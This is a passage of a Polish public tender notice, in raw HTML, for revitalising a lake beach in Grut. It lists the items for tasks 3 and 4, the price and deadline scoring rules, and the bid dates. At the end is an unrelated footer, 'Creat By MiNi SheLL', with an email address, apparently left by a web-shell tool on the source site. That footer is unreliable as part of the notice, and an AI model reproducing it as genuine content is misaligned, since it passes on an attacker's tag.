uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 10, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup, dostawa i montaż elementów małej architektury oraz zagospodarowania terenu w ramach realizacji zadania pn.: „REWITALIZACJA PLAŻY NAD JEZIOREM DUŻYM W GRUCIE”.<br/>2.	Przedmiot zamówienia został podzielony na 4 zadania:<br/><br/>Zadanie 3: Przyłącze energetyczne oraz zakup i montaż lamp solarnych<br/><br/>Zadanie obejmuje zakup elementów do przyłącza energetycznego oraz zakup z montażem lamp solarnych:<br/>- lampy solarne wraz z fundamentem betonowym – 2 szt.<br/>- elementy do przyłącza energetycznego:<br/>	- kabel YAKXS 4 x 35 mm² lub równoważny – 107,60 m<br/>	- rura osłonowa PCV lub HDPE lub równoważna o średnicy 140 mm – 107,60 m<br/>	- złącze kablowe typu Z-22 – 1 komplet </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31342000-5 - Izolowane przyłącza kablowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31320000-5 - Kable energetyczne</p> <p class="mb-0">31340000-1 - Akcesoria do kabli izolowanych</p> <p class="mb-0">31527200-8 - Oświetlenie zewnętrzne</p> <p class="mb-0">31527210-1 - Latarnie</p> <p class="mb-0">44160000-9 - Rurociągi, instalacje rurowe, rury, okładziny rurowe, rury i podobne elementy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>a)	Cena - waga kryterium 60 % (max 60 pkt)<br/>b)	Termin realizacji - waga kryterium 40 % (max 40 pkt)<br/><br/>2.	Sposób obliczania wartości punktowej dla poszczególnych kryteriów:<br/><br/>Dla zadania 1, 2, 3 i 4:<br/><br/>a) Kryterium „cena&#34;<br/>-	Ilość punktów w kryterium cena zostanie obliczona na podstawie poniższego wzoru:<br/>-	oferta o najniższej cenie otrzyma 60 pkt.<br/>Kc =Cmin/Cbad x 60 gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Cmin - najniższa cena spośród ofert nie podlegających odrzuceniu<br/>Cbad - cena oferty badanej<br/><br/>b)	kryterium „termin realizacji” – długość oferowanego terminu wykonania przedmiotu zamówienia<br/><br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/><br/>Dla każdego zadania tj. 1, 2, 3 i 4:<br/><br/><br/><br/>- do 08.04.2022 r. – 40 punktów<br/>- do 22.04.2022 r. – 30 punktów<br/>- do 29.04.2022 r. – 20 punktów<br/>- do 06.05.2022 r. – 10 punktów<br/>- do 13.05.2022 r. – 0 punktów<br/><br/>3.	Każdej ofercie, złożonej na wykonanie przedmiotu zamówienia zostanie przyznana liczba punktów wg wzoru:<br/>K = Kc + Kt<br/>Gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Kt - ilość przyznanych punktów w kryterium termin realizacji <br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>5.	Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>6.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.	W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą przesłanki do unieważnienia postępowania.<br/>8.	Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu wśród ofert złożonych na realizację przedmiotów zamówienia.<br/>9.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 10, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zakup, dostawa i montaż elementów małej architektury oraz zagospodarowania terenu w ramach realizacji zadania pn.: „REWITALIZACJA PLAŻY NAD JEZIOREM DUŻYM W GRUCIE”.<br/><br/>2.	Przedmiot zamówienia został podzielony na 4 zadania:<br/><br/>Zadanie 4: Nawierzchnia sypka plaża oraz remont pomostów:<br/><br/>Zadanie obejmuje zakup i dostawę elementów:<br/>- geowłóknina o szerokości 5,0 m – 500,63 m² <br/>- piasek na podsypkę 0-2 mm – 20 m³ <br/>- farba olejna – 20 litrów<br/>- olej do konserwacji drewna – 40 litrów<br/>- deski pomostowe – 0,600 m³ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44191000-5 - Różne drewniane materiały budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09211630-6 - Oleje przeciwkorozyjne</p> <p class="mb-0">14211000-3 - Piasek</p> <p class="mb-0">44174000-0 - Folia</p> <p class="mb-0">44812210-0 - Farby olejne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-13</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/><br/>a)	Cena - waga kryterium 60 % (max 60 pkt)<br/>b)	Termin realizacji - waga kryterium 40 % (max 40 pkt)<br/><br/>2.	Sposób obliczania wartości punktowej dla poszczególnych kryteriów:<br/><br/>Dla zadania 1, 2, 3 i 4:<br/><br/>a) Kryterium „cena&#34;<br/>-	Ilość punktów w kryterium cena zostanie obliczona na podstawie poniższego wzoru:<br/>-	oferta o najniższej cenie otrzyma 60 pkt.<br/>Kc =Cmin/Cbad x 60 gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Cmin - najniższa cena spośród ofert nie podlegających odrzuceniu<br/>Cbad - cena oferty badanej<br/><br/>b)	kryterium „termin realizacji” – długość oferowanego terminu wykonania przedmiotu zamówienia<br/><br/>Zamawiający w tym kryterium przydzieli punktację według poniższego wzoru:<br/><br/>Dla każdego zadania tj. 1, 2, 3 i 4:<br/><br/><br/><br/>- do 08.04.2022 r. – 40 punktów<br/>- do 22.04.2022 r. – 30 punktów<br/>- do 29.04.2022 r. – 20 punktów<br/>- do 06.05.2022 r. – 10 punktów<br/>- do 13.05.2022 r. – 0 punktów<br/><br/>3.	Każdej ofercie, złożonej na wykonanie przedmiotu zamówienia zostanie przyznana liczba punktów wg wzoru:<br/>K = Kc + Kt<br/>Gdzie:<br/>Kc - ilość punktów w kryterium cena<br/>Kt - ilość przyznanych punktów w kryterium termin realizacji <br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>5.	Zamawiający wybiera najkorzystniejszą ofertą w terminie związania ofertą określonym w SWZ.<br/>6.	Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>7.	W przypadku braku zgody, o której mowa w ust. 6, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba ze zachodzą przesłanki do unieważnienia postępowania.<br/>8.	Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert niepodlegających odrzuceniu wśród ofert złożonych na realizację przedmiotów zamówienia.<br/>9.	Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11.	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 10, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>	Zamawiający nie określa żadnego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile <br/> wynika to z odrębnych przepisów:<br/>	Zamawiający nie określa żadnego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie określa żadnego warunku w tym zakresie; <br/>4) zdolności technicznej lub zawodowej:<br/>Zamawiający nie określa żadnego warunku w tym zakresie; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w Rozdziale XI lit. a) i b) SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/> 3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia Zamawiający zawarł w załączonym do SWZ projekcie umowy - załącznik nr 7 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-10 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-10 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania zamówienia<br/><br/>1.	Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie do 13.05.2022 r. <br/>2.	Termin wykonania zamówienia stanowi kryterium oceny ofert:<br/><br/>Dla każdego zadania 1, 2, 3 i 4:<br/><br/>- do 08.04.2022 r. – 40 punktów<br/>- do 22.04.2022 r. – 30 punktów<br/>- do 29.04.2022 r. – 20 punktów<br/>- do 06.05.2022 r. – 10 punktów<br/>- do 13.05.2022 r. – 0 punktów

Creat By MiNi SheLL
Email: jattceo@gmail.com